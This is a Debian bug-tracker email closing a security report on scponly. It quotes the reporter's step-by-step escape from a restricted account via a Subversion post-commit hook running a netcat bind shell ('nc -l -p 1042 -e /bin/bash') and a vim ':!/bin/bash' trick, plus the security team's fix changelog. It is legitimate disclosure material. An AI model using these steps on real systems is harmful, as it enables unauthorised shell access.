Your message dated Wed, 23 Jan 2008 19:52:12 +0000 with message-id <[EMAIL PROTECTED]> and subject line Bug#437148: fixed in scponly 4.6-1etch1 has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with. If this is not the case it is now your responsibility to reopen the Bug report if necessary, and/or fix the problem forthwith. (NB: If you are a system administrator and have no idea what I am talking about this indicates a serious mail system misconfiguration somewhere. Please contact me immediately.) Debian bug tracking system administrator (administrator, Debian Bugs database)
--- Begin Message ---Package: scponly Version: 4.6-1 X-Debbugs-CC: [EMAIL PROTECTED] Severity: grave Tags: security Hi Thomas Wana, messing around with some friends here, I tried to access his computer with only a scponly protected account. I discovered this way of gaining full shell access: I locally created a subversion repository /tmp/blubb with a /tmp/blubb/hooks/post-commit that contains the command: ( nc -l -p 1042 -e /bin/bash) & I copy this repositry using scp -r /tmp/blubb/ [EMAIL PROTECTED]: Then I check out the repository remotely: ssh [EMAIL PROTECTED] /usr/bin/svn co file:///home/user/blubb bla Now I add a file and commit it: touch blah scp blah [EMAIL PROTECTED]:bla/ ssh [EMAIL PROTECTED] /usr/bin/svn ci bla At this point, I have a vim instance running, asking me for the commit message. I could now just run :!/bin/bash to get a shell, but having done the post-commit hook already, I want to use that, so I write something and quit the editor with :x At this point, I can use nc host 1042 and I have a shell for the account that should have none. The solution would be: Do not enable access to svn (or svnserve), which is a simple compilation option. I’d appreciate it if this gets fixed in debian etch. I have sent this information to [EMAIL PROTECTED] and scponly’s upstream maintainer last week, but have not yet gotten a response. Greetings, Joachim -- Joachim "nomeata" Breitner Debian Developer [EMAIL PROTECTED] | ICQ# 74513189 | GPG-Keyid: 4743206C JID: [EMAIL PROTECTED] | http://people.debian.org/~nomeata
signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil
--- End Message ---
--- Begin Message ---Source: scponly Source-Version: 4.6-1etch1 We believe that the bug you reported is fixed in the latest version of scponly, which is due to be installed in the Debian FTP archive: scponly_4.6-1etch1.diff.gz to pool/main/s/scponly/scponly_4.6-1etch1.diff.gz scponly_4.6-1etch1.dsc to pool/main/s/scponly/scponly_4.6-1etch1.dsc scponly_4.6-1etch1_amd64.deb to pool/main/s/scponly/scponly_4.6-1etch1_amd64.deb A summary of the changes between this version and the previous one is attached. Thank you for reporting the bug, which will now be closed. If you have further comments please address them to [EMAIL PROTECTED], and the maintainer will reopen the bug report if appropriate. Debian distribution maintenance software pp. Florian Weimer <[EMAIL PROTECTED]> (supplier of updated scponly package) (This message was generated automatically at their request; if you believe that there is a problem with it please contact the archive administrators by mailing [EMAIL PROTECTED]) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Format: 1.7 Date: Tue, 25 Dec 2007 14:11:00 +0100 Source: scponly Binary: scponly Architecture: source amd64 Version: 4.6-1etch1 Distribution: stable-security Urgency: high Maintainer: Thomas Wana <[EMAIL PROTECTED]> Changed-By: Florian Weimer <[EMAIL PROTECTED]> Description: scponly - Restricts the commands available to scp- and sftp-users Closes: 437148 Changes: scponly (4.6-1etch1) stable-security; urgency=high . * Non-maintainer upload by the Security Team * Remove rsync, Subversion and Unison support because it was possible to gain shell access through them (CVE-2007-6350). Closes: #437148. * scp: -o and -F options are dangerous (CVE-2007-6415). Files: c02dfefb7289fcb09e9ac83d7cf78655 890 utils optional scponly_4.6-1etch1.dsc 0425cb868cadd026851238452f1db907 96578 utils optional scponly_4.6.orig.tar.gz a588cb9138820d73f16bc81ffc4f8e20 28528 utils optional scponly_4.6-1etch1.diff.gz 2bb425113107e4e471c15685333f1a0a 34214 utils optional scponly_4.6-1etch1_amd64.deb -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBR3EI5797/wQC1SS+AQLsYAf9FvSLLurAKk42qCXJgjysHinC0iLsKpZp aTVAxPCInbqg7IwX5Rf28gXogQ3OROStMZfduyjxaRXUxnLkgD+pTS/aYKbIueEo LvL2bhHJFyQQuxqZ3wOBLvHndRWAwdsuNWxnpQPDgxWVDzw3jVINp50bk25aVMV8 OMkNxhcJUWjhr71TRv7A1aNfn70z8lnZGTjyBMkqr9MEqiJ2vYr7TPbyhONBqmad 8g6IJj1oJ3aq5wRuoZ88Klwze6kWXfb7TdN6I4grDVZ8JRoBb/AhX5tyXVHo5mZ1 NcgLb/XCLJpLtgI0Lh6/8qErvqE+d5FOYqEKtNLXzng12iPiw4YoNQ== =eP3R -----END PGP SIGNATURE-----
--- End Message ---
